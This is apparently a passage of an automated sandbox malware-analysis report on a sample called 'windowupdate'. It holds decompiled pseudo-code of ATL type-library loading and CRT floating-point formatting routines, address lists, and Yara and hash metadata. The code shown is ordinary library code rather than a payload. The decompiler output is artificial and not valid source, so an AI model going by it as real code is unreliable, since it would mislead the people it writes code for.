					E00D3B190( &_v16, _t368);
					_t184 = _v428;
					L60:
					E00DC13E0(_t269, _t354, 0xd3b0a0, _v456);
					_t186 = _t184;
					_t335 = _t333;
					return E00D47280(_t186, _t269, _v8 ^ _t354, _t335, _t352, _t353);
				}
			}










































































                      0x00d3a960
                      0x00d3a96b
                      0x00d3a97b
                      0x00d3a97b
                      0x00d3a97b
                      0x00d3a97d
                      0x00d3a984
                      0x00d3a987
                      0x00d3a994
                      0x00d3a999
                      0x00d3a99d
                      0x00d3a9c5
                      0x00d3a9ca
                      0x00d3a9cd
                      0x00d3a9cf
                      0x00d3aa1b
                      0x00d3aa20
                      0x00d3aa31
                      0x00d3aa37
                      0x00d3aa3e
                      0x00d3aa41
                      0x00d3aa45
                      0x00d3aa64
                      0x00d3aa6e
                      0x00d3aa71
                      0x00d3aa74
                      0x00d3aa77
                      0x00000000
                      0x00000000
                      0x00d3aa80
                      0x00d3aa85
                      0x00d3aa8b
                      0x00d3aa91
                      0x00d3aa97
                      0x00d3aa9a
                      0x00d3aa9e
                      0x00d3ab76
                      0x00d3ab79
                      0x00d3abb5
                      0x00d3abb8
                      0x00d3abd2
                      0x00d3abd7
                      0x00d3abda
                      0x00d3abdd
                      0x00d3abdf
                      0x00d3abdf
                      0x00d3abdd
                      0x00d3abe8
                      0x00d3abee
                      0x00d3ac07
                      0x00d3ac0c
                      0x00d3ac0e
                      0x00d3ac10
                      0x00d3ab7b
                      0x00d3ab83
                      0x00d3ab89
                      0x00d3ab9c
                      0x00d3aba7
                      0x00d3aba9
                      0x00d3abab
                      0x00d3abab
                      0x00d3ac15
                      0x00d3ac1b
                      0x00000000
                      0x00d3ac1b
                      0x00d3aaa7
                      0x00d3aaaa
                      0x00d3aae9
                      0x00d3aaec
                      0x00d3ab06
                      0x00d3ab0b
                      0x00d3ab0e
                      0x00d3ab11
                      0x00d3ab13
                      0x00d3ab13
                      0x00d3ab11
                      0x00d3ab1c
                      0x00d3ab22
                      0x00d3ab3d
                      0x00d3ab40
                      0x00d3ab42
                      0x00d3ab49
                      0x00d3aaac
                      0x00d3aab4
                      0x00d3aaba
                      0x00d3aad3
                      0x00d3aad8
                      0x00d3aada
                      0x00d3aae1
                      0x00d3aae1
                      0x00d3ab4c
                      0x00d3ab50
                      0x00000000
                      0x00d3ab52
                      0x00d3ab55
                      0x00d3ab5e
                      0x00d3ab63
                      0x00000000
                      0x00d3ab63
                      0x00d3ab50
                      0x00d3ac23
                      0x00d3ac27
                      0x00d3b056
                      0x00d3b056
                      0x00d3b063
                      0x00d3b068
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d3ac2d
                      0x00d3ac2d
                      0x00d3ac2d
                      0x00d3ac31
                      0x00d3ac3c
                      0x00d3ac42
                      0x00d3ac44
                      0x00d3ac49
                      0x00d3ac4b
                      0x00d3ac59
                      0x00d3ac4d
                      0x00d3ac4d
                      0x00d3ac4d
                      0x00d3ac69
                      0x00d3ac6f
                      0x00d3ac76
                      0x00d3ac90
                      0x00d3ac95
                      0x00d3ac98
                      0x00d3ac9b
                      0x00d3ac9d
                      0x00d3ac9d
                      0x00d3ac9b
                      0x00d3ac9e
                      0x00d3aca5
                      0x00000000
                      0x00000000
                      0x00d3acc4
                      0x00d3acc6
                      0x00000000
                      0x00000000
                      0x00d3accc
                      0x00d3acdb
                      0x00d3ace1
                      0x00d3aceb
                      0x00d3acfb
                      0x00d3ad06
                      0x00d3ad0c
                      0x00d3ad13
                      0x00d3ad24
                      0x00d3ad36
                      0x00d3ad4c
                      0x00d3ad51
                      0x00d3ad54
                      0x00d3ad56
                      0x00d3ad67
                      0x00d3ad71
                      0x00d3add6
                      0x00d3ade8
                      0x00d3adee
                      0x00d3ae03
                      0x00d3ae0f
                      0x00d3ae15
                      0x00d3ae1b
                      0x00d3ae21
                      0x00d3ae27
                      0x00d3ae2d
                      0x00d3ae34
                      0x00d3ae4b
                      0x00d3ae66
                      0x00d3ae7f
                      0x00d3ae84
                      0x00d3ae92
                      0x00d3ae9f
                      0x00d3aea4
                      0x00d3aed1
                      0x00d3aed7
                      0x00d3aede
                      0x00d3aee0
                      0x00d3af09
                      0x00d3af0f
                      0x00d3af16
                      0x00d3af22
                      0x00d3af27
                      0x00d3af2e
                      0x00d3af30
                      0x00d3af37
                      0x00d3af46
                      0x00d3af46
                      0x00d3af37
                      0x00d3af2e
                      0x00d3af5c
                      0x00d3af70
                      0x00d3af77
                      0x00d3af90
                      0x00d3af95
                      0x00d3afbb
                      0x00d3afc1
                      0x00d3afc8
                      0x00d3afca
                      0x00d3afda
                      0x00d3aff3
                      0x00d3aff9
                      0x00d3b000
                      0x00d3b00c
                      0x00d3b011
                      0x00d3b018
                      0x00d3b01a
                      0x00d3b021
                      0x00d3b030
                      0x00d3b030
                      0x00d3b021
                      0x00d3b018
                      0x00d3b03b
                      0x00d3b046
                      0x00d3b046
                      0x00d3b051
                      0x00000000
                      0x00d3b051
                      0x00d3ad7a
                      0x00d3ad7f
                      0x00d3ad85
                      0x00d3ad87
                      0x00000000
                      0x00000000
                      0x00d3ad92
                      0x00d3ad9e
                      0x00d3ada3
                      0x00d3adbc
                      0x00d3adc1
                      0x00d3adce
                      0x00000000
                      0x00d3adce
                      0x00d3ad58
                      0x00000000
                      0x00d3ad58
                      0x00d3ad15
                      0x00000000
                      0x00d3ad15
                      0x00d3aca7
                      0x00d3acb4
                      0x00d3acb9
                      0x00d3aa47
                      0x00d3aa47
                      0x00d3aa54
                      0x00d3aa59
                      0x00d3aa59
                      0x00d3a9d1
                      0x00d3a9d1
                      0x00d3a9d3
                      0x00d3a9f5
                      0x00d3a9f8
                      0x00d3a9fa
                      0x00d3a9fa
                      0x00d3a9f8
                      0x00d3a9fb
                      0x00d3aa08
                      0x00d3aa0d
                      0x00d3aa0d
                      0x00000000
                      0x00d3a99f
                      0x00d3a99f
                      0x00d3a9ac
                      0x00d3a9b1
                      0x00d3b06e
                      0x00d3b07e
                      0x00d3b083
                      0x00d3b084
                      0x00d3b09a
                      0x00d3b09a

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module
                      • String ID: $%ls$0 && "Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects."$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CLSID\$\Implemented Categories$\Required Categories$__atl_condVal$pEntry->iType == 2
                      • API String ID: 193471262-2261637480
                      • Opcode ID: 64da7918a2c9a5a40e1ae962d3a8c7b72f4b108bab31b89aa92ab61b1058b0ba
                      • Instruction ID: a3ca8d82ddbc65f06c7b86878921e8442543b95fbd959b167f3181cdaf64cbb2
                      • Opcode Fuzzy Hash: 64da7918a2c9a5a40e1ae962d3a8c7b72f4b108bab31b89aa92ab61b1058b0ba
                      • Instruction Fuzzy Hash: DF121575E002299FDB24EB54DC92BEEB3B5AF54300F1441D9E649A7281DB70AE84CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DAC260 Relevance: 38.7, APIs: 10, Strings: 12, Instructions: 196COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00DAC260(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long _a4, intOrPtr _a12, intOrPtr* _a16, char* _a20, char* _a24) {
				char _v5;
				void* _v6;
				signed char _v7;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v56;
				signed int _t84;
				intOrPtr* _t100;
				void* _t103;
				intOrPtr* _t111;
				intOrPtr* _t112;
				signed int _t123;
				signed int _t127;
				intOrPtr _t136;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = __esi;
				_t141 = __edi;
				_t103 = __ebx;
				E00DAAA30( &_v56, __edx, __eflags);
				_v12 =  &_a4;
				_t123 =  *(_v12 + 4);
				_v28 = E00DBEEF0( *_v12, 0x3f, _t123) & 0x00000001;
				_v24 = _t123 & 0x00000000;
				if(_v28 != 1 || _v24 != 0) {
					_v5 = 0x20;
				} else {
					_v5 = 0x2d;
				}
				 *_a16 = _v5;
				 *((intOrPtr*)(_a16 + 8)) = _a20;
				_t127 =  *(_v12 + 4);
				_v36 = E00DBEEF0( *_v12, 0x34, _t127) & 0x000007ff;
				_v32 = _t127 & 0x00000000;
				if((_v36 | _v32) != 0) {
					L7:
					_v6 = 0;
					goto L8;
				} else {
					_t100 = _v12;
					_v44 =  *_t100;
					_v40 =  *(_t100 + 4) & 0x000fffff;
					if((_v44 | _v40) != 0) {
						goto L7;
					}
					_v6 = 1;
					L8:
					_v7 = _v6;
					if((_v7 & 0x000000ff) == 0) {
						_t84 = E00D96D50(__eflags,  &_a4);
						_t144 = _t143 + 4;
						_v20 = _t84;
						__eflags = _v20;
						if(_v20 != 0) {
							 *((intOrPtr*)(_a16 + 4)) = 1;
						}
						_v16 = _v20;
						_v16 = _v16 - 1;
						__eflags = _v16 - 3;
						if(_v16 > 3) {
							_t111 = _v12;
							_t112 = _v12;
							 *_t112 =  *_t111;
							 *(_t112 + 4) =  *(_t111 + 4) & 0x7fffffff;
							_push(_a24);
							_push(_a20);
							_push(_a16 + 4);
							_t136 = _a12 + 1;
							__eflags = _t136;
							_push(_t136);
							 *((long long*)(_t144 - 8)) = _a4;
							E00DAA370(_t103, _t141, _t142);
							return E00DAAA80( &_v56);
						} else {
							switch( *((intOrPtr*)(_v16 * 4 +  &M00DAC4E8))) {
								case 0:
									E00D84A20(E00D82DE0(_a20, _a24, "1#INF"), _t93, L"strcpy_s(result, result_count, \"1#INF\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12b, 0);
									return E00DAAA80( &_v56);
								case 1:
									__ecx = _a24;
									__edx = _a20;
									E00D82DE0(_a20, _a24, "1#QNAN") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#QNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12c, 0);
									__ecx =  &_v56;
									return E00DAAA80( &_v56);
								case 2:
									__eax = _a24;
									__ecx = _a20;
									E00D82DE0(_a20, _a24, "1#SNAN") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#SNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12d, 0);
									__ecx =  &_v56;
									return E00DAAA80( &_v56);
								case 3:
									__edx = _a24;
									__eax = _a20;
									E00D82DE0(_a20, _a24, "1#IND") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#IND\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12e, 0);
									__ecx =  &_v56;
									return E00DAAA80( &_v56);
							}
						}
					}
					 *((intOrPtr*)(_a16 + 4)) = 0;
					E00D84A20(E00D82DE0(_a20, _a24, "0"), _t97, L"strcpy_s(result, result_count, \"0\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x11e, 0);
					return E00DAAA80( &_v56);
				}
			}




























                      0x00dac260
                      0x00dac260
                      0x00dac260
                      0x00dac26b
                      0x00dac273
                      0x00dac27b
                      0x00dac28b
                      0x00dac28e
                      0x00dac295
                      0x00dac2a3
                      0x00dac29d
                      0x00dac29d
                      0x00dac29d
                      0x00dac2ae
                      0x00dac2b6
                      0x00dac2be
                      0x00dac2d0
                      0x00dac2d3
                      0x00dac2dc
                      0x00dac300
                      0x00dac300
                      0x00000000
                      0x00dac2de
                      0x00dac2de
                      0x00dac2ec
                      0x00dac2ef
                      0x00dac2f8
                      0x00000000
                      0x00000000
                      0x00dac2fa
                      0x00dac304
                      0x00dac307
                      0x00dac310
                      0x00dac361
                      0x00dac366
                      0x00dac369
                      0x00dac36c
                      0x00dac370
                      0x00dac375
                      0x00dac375
                      0x00dac37f
                      0x00dac388
                      0x00dac38b
                      0x00dac38f
                      0x00dac4a0
                      0x00dac4ad
                      0x00dac4b0
                      0x00dac4b2
                      0x00dac4b8
                      0x00dac4bc
                      0x00dac4c3
                      0x00dac4c7
                      0x00dac4c7
                      0x00dac4ca
                      0x00dac4d1
                      0x00dac4d4
                      0x00000000
                      0x00dac395
                      0x00dac398
                      0x00000000
                      0x00dac3cb
                      0x00000000
                      0x00000000
                      0x00dac3fb
                      0x00dac3ff
                      0x00dac40c
                      0x00dac414
                      0x00000000
                      0x00000000
                      0x00dac43c
                      0x00dac440
                      0x00dac44d
                      0x00dac455
                      0x00000000
                      0x00000000
                      0x00dac47d
                      0x00dac481
                      0x00dac48e
                      0x00dac496
                      0x00000000
                      0x00000000
                      0x00dac398
                      0x00dac38f
                      0x00dac315
                      0x00dac348
                      0x00000000
                      0x00dac353

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DAC33F
                      • __invoke_watson_if_error.LIBCMTD ref: 00DAC348
                      • __aligned_msize.LIBCMTD ref: 00DAC3C2
                      • __invoke_watson_if_error.LIBCMTD ref: 00DAC3CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                      • API String ID: 4254006664-1152488507
                      • Opcode ID: 84f553fecd23eda2f47c3d112aa1e9a8ef13cc73891005cfd8a60fbb9f6e7422
                      • Instruction ID: bf0c99a636b0bfe8af7d430b29fcc241d88f71b163110b751a1cbeb1dfbb400b
                      • Opcode Fuzzy Hash: 84f553fecd23eda2f47c3d112aa1e9a8ef13cc73891005cfd8a60fbb9f6e7422
                      • Instruction Fuzzy Hash: D6719B74A00248AFCB04EF94D882FEE7BB5AF49704F148158F905AB282D775AA05CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3A1D0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 444COMMON
                      Download Yara Rule
                      C-Code - Quality: 88%
                      			E00D3A1D0(void* __ebx, struct HINSTANCE__* _a4, signed int _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16) {
				signed int _v8;
				unsigned int _v16;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _v32;
				char _v40;
				char _v320;
				signed int _v328;
				intOrPtr _v332;
				struct HINSTANCE__ _v336;
				signed int _v340;
				intOrPtr _v344;
				struct HINSTANCE__* _v348;
				signed int _v352;
				signed int _v356;
				char _v364;
				char _v368;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				signed int _v404;
				struct HINSTANCE__ _v412;
				struct HINSTANCE__* _v420;
				struct HINSTANCE__* _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				struct HINSTANCE__* _v440;
				struct HINSTANCE__* _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				struct HINSTANCE__* _v460;
				struct HINSTANCE__* _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				void* _v484;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t202;
				void* _t204;
				intOrPtr _t205;
				void* _t207;
				long _t211;
				struct HINSTANCE__ _t213;
				signed int _t217;
				void* _t228;
				char _t231;
				signed int _t239;
				signed char _t247;
				signed char _t255;
				signed int _t263;
				intOrPtr _t269;
				signed char _t276;
				void* _t286;
				void* _t287;
				struct HINSTANCE__* _t344;
				void* _t346;
				char _t354;
				void* _t375;
				void* _t376;
				signed int _t378;
				void* _t379;
				intOrPtr _t380;
				intOrPtr _t382;
				void* _t384;
				void* _t387;

				_t287 = __ebx;
				_t375 =  &_v476;
				memset(_t375, 0xcccccccc, 0x76 << 2);
				_t380 = _t379 + 0xc;
				_t376 = _t375 + 0x76;
				_t202 =  *0xdf600c; // 0x71e60372
				_v8 = _t202 ^ _t378;
				_v412 = 0;
				if(_a12 == 0) {
					L2:
					_t204 = L00D84930(_t390, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bcb, 0, "%ls", L"pbstrPath != 0 && ppTypeLib != 0");
					_t380 = _t380 + 0x18;
					if(_t204 == 1) {
						asm("int3");
					}
					L4:
					if(_a12 == 0 || _a16 == 0) {
						_t205 = 0x80004003;
						goto L64;
					} else {
						 *_a12 = 0;
						 *_a16 = 0;
						_v16 = 0;
						_v24 = E00D31AB0();
						_v28 = 0;
						_v32 = 0;
						E00D3F2E0( &_v40);
						__eflags = _a4;
						if(__eflags == 0) {
							_t286 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bd3, 0, "%ls", L"hInstTypeLib != 0");
							_t380 = _t380 + 0x18;
							__eflags = _t286 - 1;
							if(_t286 == 1) {
								asm("int3");
							}
						}
						_t377 = _t380;
						_t344 = _a4;
						_t211 = GetModuleFileNameA(_t344,  &_v320, 0x104);
						__eflags = _t380 - _t380;
						_v328 = E00DC1520(_t211, _t380 - _t380);
						__eflags = _v328;
						if(_v328 != 0) {
							__eflags = _v328 - 0x104;
							if(_v328 != 0x104) {
								_v336 = 0;
								_t213 = E00DBFED0(_t377,  &_v320);
								_t382 = _t380 + 4;
								_v336 = _t213;
								__eflags = _a8;
								if(_a8 == 0) {
									L32:
									_v32 =  &_v320;
									__eflags = _v32;
									if(_v32 != 0) {
										_v16 = E00D82E00(_v32) + 1;
										_t217 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
										_t382 = _t382 + 0x10;
										__eflags = _t217;
										if(_t217 >= 0) {
											__eflags = _v16 - 0x400;
											if(__eflags > 0) {
												L39:
												_v456 = E00D3F270(_t287,  &_v40, __eflags, _v16);
												L40:
												_t300 = _v16 >> 1;
												__eflags = _v16 >> 1;
												_v444 = E00D31AC0(_v16 >> 1, _t377, _v456, _v32, _t300, _v24);
												L41:
												_v440 = _v444;
												L42:
												_t344 = _v440;
												_v352 = _t344;
												__eflags = _v352;
												if(_v352 != 0) {
													_t377 = _t382;
													__imp__#161(_v352, _a16);
													__eflags = _t382 - _t382;
													_v356 = E00DC1520(_a16, _t382 - _t382);
													__eflags = _v356;
													if(_v356 >= 0) {
														L60:
														__eflags = _v356;
														if(_v356 >= 0) {
															_t377 = _t382;
															__imp__#2(_v352);
															__eflags = _t382 - _t382;
															 *_a12 = E00DC1520(_t223, _t382 - _t382);
															_t344 = _a12;
															__eflags = _t344->i;
															if(_t344->i == 0) {
																_v356 = 0x8007000e;
																_t377 = _t382;
																_t344 =  *( *( *_a16) + 8);
																_t228 = _t344->i( *_a16);
																__eflags = _t382 - _t382;
																E00DC1520(_t228, _t382 - _t382);
																 *_a16 = 0;
															}
														}
														_v404 = _v356;
														E00D3F220( &_v40);
														_t205 = _v404;
														goto L64;
													}
													_t354 = ".tlb"; // 0x626c742e
													_v368 = _t354;
													_t231 =  *0xdef704; // 0x0
													_v364 = _t231;
													_t344 =  &_v320;
													__eflags = _v336 - _t344 + 5 - 0x104;
													if(__eflags <= 0) {
														E00D326C0(_t287, _t376, _t377, __eflags, _v336, 0x10e - _v336 -  &_v320,  &_v368);
														_t384 = _t382 + 0xc;
														_v32 =  &_v320;
														__eflags = _v32;
														if(_v32 != 0) {
															_v16 = E00D82E00(_v32) + 1;
															_t239 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
															_t382 = _t384 + 0x10;
															__eflags = _t239;
															if(_t239 >= 0) {
																__eflags = _v16 - 0x400;
																if(__eflags > 0) {
																	L54:
																	_v476 = E00D3F270(_t287,  &_v40, __eflags, _v16);
																	L55:
																	_t317 = _v16 >> 1;
																	__eflags = _v16 >> 1;
																	_v464 = E00D31AC0(_v16 >> 1, _t377, _v476, _v32, _t317, _v24);
																	L56:
																	_v460 = _v464;
																	L57:
																	_t344 = _v460;
																	_v352 = _t344;
																	__eflags = _v352;
																	if(_v352 != 0) {
																		_t377 = _t382;
																		__imp__#161(_v352, _a16);
																		__eflags = _t382 - _t382;
																		_v356 = E00DC1520(_a16, _t382 - _t382);
																		goto L60;
																	}
																	_v400 = 0x8007000e;
																	E00D3F220( &_v40);
																	_t205 = _v400;
																	goto L64;
																}
																_t247 = E00D31900(__eflags, _v16);
																_t382 = _t382 + 4;
																__eflags = _t247 & 0x000000ff;
																if(__eflags == 0) {
																	goto L54;
																}
																_v468 = _v16 + 0x24;
																E00DBF1D0(_v468);
																_v472 = _t382;
																E00DC13A0(_v472, _v468,  &_v412);
																_v472 = _v472 + 0x20;
																_v476 = _v472;
																goto L55;
															}
															_v464 = 0;
															goto L56;
														}
														_v460 = 0;
														goto L57;
													}
													_v396 = 0x80004005;
													E00D3F220( &_v40);
													_t205 = _v396;
													goto L64;
												}
												_v392 = 0x8007000e;
												E00D3F220( &_v40);
												_t205 = _v392;
												goto L64;
											}
											_t255 = E00D31900(__eflags, _v16);
											_t382 = _t382 + 4;
											__eflags = _t255 & 0x000000ff;
											if(__eflags == 0) {
												goto L39;
											}
											_v448 = _v16 + 0x24;
											E00DBF1D0(_v448);
											_v452 = _t382;
											E00DC13A0(_v452, _v448,  &_v412);
											_v452 = _v452 + 0x20;
											_v456 = _v452;
											goto L40;
										}
										_v444 = 0;
										goto L41;
									}
									_v440 = 0;
									goto L42;
								}
								_v28 = _a8;
								__eflags = _v28;
								if(__eflags != 0) {
									_v16 = E00D85A70(_v28) + 1;
									_t263 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
									_t382 = _t382 + 0x10;
									__eflags = _t263;
									if(_t263 >= 0) {
										__eflags = _v16 - 0x400;
										if(__eflags > 0) {
											L22:
											_v436 = E00D3F270(_t287,  &_v40, __eflags, _v16);
											L23:
											_v424 = E00D31BB0(_v16, _t377, _v436, _v28, _v16, _v24);
											L24:
											_v420 = _v424;
											L25:
											_t344 = _v420;
											_v340 = _t344;
											__eflags = _v340;
											if(_v340 != 0) {
												_t269 = E00D82E00(_v340);
												_t387 = _t382 + 4;
												_v344 = _t269;
												_v348 = _v328 + _v344;
												_t344 = _v348;
												__eflags = _t344 - _v328;
												if(_t344 < _v328) {
													L30:
													_v388 = 0x80004005;
													E00D3F220( &_v40);
													_t205 = _v388;
													goto L64;
												}
												__eflags = _v348 - _v344;
												if(_v348 < _v344) {
													goto L30;
												}
												__eflags = _v348 - 0x10e;
												if(_v348 < 0x10e) {
													__eflags = 0x10e;
													E00D326C0(_t287, _t376, _t377, 0x10e, _t378 + _v328 - 0x13c, 0x10e - _v328, _v340);
													_t382 = _t387 + 0xc;
													goto L32;
												}
												goto L30;
											}
											_v384 = 0x8007000e;
											E00D3F220( &_v40);
											_t205 = _v384;
											goto L64;
										}
										_t276 = E00D31900(__eflags, _v16);
										_t382 = _t382 + 4;
										__eflags = _t276 & 0x000000ff;
										if(__eflags == 0) {
											goto L22;
										}
										_v428 = _v16 + 0x24;
										E00DBF1D0(_v428);
										_v432 = _t382;
										E00DC13A0(_v432, _v428,  &_v412);
										_v432 = _v432 + 0x20;
										_v436 = _v432;
										goto L23;
									}
									_v424 = 0;
									goto L24;
								}
								_v420 = 0;
								goto L25;
							}
							_v380 = E00D31710( &_v320, 0x7a);
							E00D3F220( &_v40);
							_t205 = _v380;
							goto L64;
						} else {
							_v332 = E00D32DC0( &_v320, _t377);
							_v376 = _v332;
							E00D3F220( &_v40);
							_t205 = _v376;
							L64:
							E00DC13E0(_t287, _t378, 0xd3a8d8, _v412);
							_t207 = _t205;
							_t346 = _t344;
							return E00D47280(_t207, _t287, _v8 ^ _t378, _t346, _t376, _t377);
						}
					}
				}
				_t390 = _a16;
				if(_a16 != 0) {
					goto L4;
				}
				goto L2;
			}












































































                      0x00d3a1d0
                      0x00d3a1db
                      0x00d3a1eb
                      0x00d3a1eb
                      0x00d3a1eb
                      0x00d3a1ed
                      0x00d3a1f4
                      0x00d3a1f7
                      0x00d3a205
                      0x00d3a20d
                      0x00d3a225
                      0x00d3a22a
                      0x00d3a230
                      0x00d3a232
                      0x00d3a232
                      0x00d3a233
                      0x00d3a237
                      0x00d3a23f
                      0x00000000
                      0x00d3a249
                      0x00d3a24c
                      0x00d3a255
                      0x00d3a25b
                      0x00d3a267
                      0x00d3a26a
                      0x00d3a271
                      0x00d3a27b
                      0x00d3a280
                      0x00d3a284
                      0x00d3a29e
                      0x00d3a2a3
                      0x00d3a2a6
                      0x00d3a2a9
                      0x00d3a2ab
                      0x00d3a2ab
                      0x00d3a2a9
                      0x00d3a2ac
                      0x00d3a2ba
                      0x00d3a2be
                      0x00d3a2c4
                      0x00d3a2cb
                      0x00d3a2d1
                      0x00d3a2d8
                      0x00d3a306
                      0x00d3a310
                      0x00d3a335
                      0x00d3a346
                      0x00d3a34b
                      0x00d3a34e
                      0x00d3a354
                      0x00d3a358
                      0x00d3a519
                      0x00d3a51f
                      0x00d3a522
                      0x00d3a526
                      0x00d3a546
                      0x00d3a553
                      0x00d3a558
                      0x00d3a55b
                      0x00d3a55d
                      0x00d3a56e
                      0x00d3a575
                      0x00d3a5d4
                      0x00d3a5e0
                      0x00d3a5e6
                      0x00d3a5ed
                      0x00d3a5ed
                      0x00d3a600
                      0x00d3a606
                      0x00d3a60c
                      0x00d3a612
                      0x00d3a612
                      0x00d3a618
                      0x00d3a61e
                      0x00d3a625
                      0x00d3a644
                      0x00d3a651
                      0x00d3a657
                      0x00d3a65e
                      0x00d3a664
                      0x00d3a66b
                      0x00d3a835
                      0x00d3a835
                      0x00d3a83c
                      0x00d3a83e
                      0x00d3a847
                      0x00d3a84d
                      0x00d3a857
                      0x00d3a859
                      0x00d3a85c
                      0x00d3a85f
                      0x00d3a861
                      0x00d3a877
                      0x00d3a87a
                      0x00d3a87d
                      0x00d3a87f
                      0x00d3a881
                      0x00d3a889
                      0x00d3a889
                      0x00d3a85f
                      0x00d3a895
                      0x00d3a89e
                      0x00d3a8a3
                      0x00000000
                      0x00d3a8a3
                      0x00d3a671
                      0x00d3a677
                      0x00d3a67d
                      0x00d3a682
                      0x00d3a68e
                      0x00d3a699
                      0x00d3a69f
                      0x00d3a6e2
                      0x00d3a6e7
                      0x00d3a6f0
                      0x00d3a6f3
                      0x00d3a6f7
                      0x00d3a717
                      0x00d3a724
                      0x00d3a729
                      0x00d3a72c
                      0x00d3a72e
                      0x00d3a73f
                      0x00d3a746
                      0x00d3a7a5
                      0x00d3a7b1
                      0x00d3a7b7
                      0x00d3a7be
                      0x00d3a7be
                      0x00d3a7d1
                      0x00d3a7d7
                      0x00d3a7dd
                      0x00d3a7e3
                      0x00d3a7e3
                      0x00d3a7e9
                      0x00d3a7ef
                      0x00d3a7f6
                      0x00d3a815
                      0x00d3a822
                      0x00d3a828
                      0x00d3a82f
                      0x00000000
                      0x00d3a82f
                      0x00d3a7f8
                      0x00d3a805
                      0x00d3a80a
                      0x00000000
                      0x00d3a80a
                      0x00d3a74c
                      0x00d3a751
                      0x00d3a757
                      0x00d3a759
                      0x00000000
                      0x00000000
